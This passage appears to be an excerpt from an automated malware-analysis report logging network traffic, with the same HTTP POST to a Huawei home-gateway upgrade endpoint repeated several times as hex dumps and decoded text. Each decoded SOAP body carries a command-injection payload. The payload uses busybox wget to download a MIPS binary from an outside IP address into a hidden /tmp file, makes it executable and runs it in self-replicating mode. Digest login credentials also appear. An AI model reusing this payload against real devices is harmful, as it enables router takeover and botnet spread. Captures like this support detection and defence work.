73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 